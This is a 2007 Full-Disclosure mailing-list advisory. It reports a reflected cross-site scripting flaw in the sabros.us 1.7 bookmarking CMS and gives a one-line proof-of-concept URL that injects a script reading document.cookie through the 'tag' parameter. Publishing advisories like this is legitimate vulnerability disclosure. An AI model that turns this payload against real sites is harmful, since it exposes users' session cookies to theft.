[Full-disclosure] [x0ne-h4ck] sabros.us 1.7 XSS Exploit

[corrado.liotta at alice.it]

-=[--------------------ADVISORY-------------------]=-
                                              
                        sabros.us 1.7    
                                               
  Author: CorryL    [corryl80 at gmail.com]   
-=[-----------------------------------------------]=-


-=[+] Application:    sabros.us 
-=[+] Version:        1.7
-=[+] Vendor's URL:   http://sourceforge.net/projects/sabrosus/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck        


..::[ Descriprion ]::..

sabros.us is a CMS to put your bookmarks online with folksonomy support; 
just like del.icio.us, but the big diference is you will have 
the complete control of the source code and written on PHP with MySQL 
as backend we make it cross platform.


..::[ Proof Of Concept ]::..

http://remote-server/index.php?tag=</title><script>alert(document.cookie)</script>






**************
Registrati ad Alice Basic e scarica Alice Messenger, 
il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici!
Per maggiori informazioni vai su: 
http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070118/13c4b713/attachment.html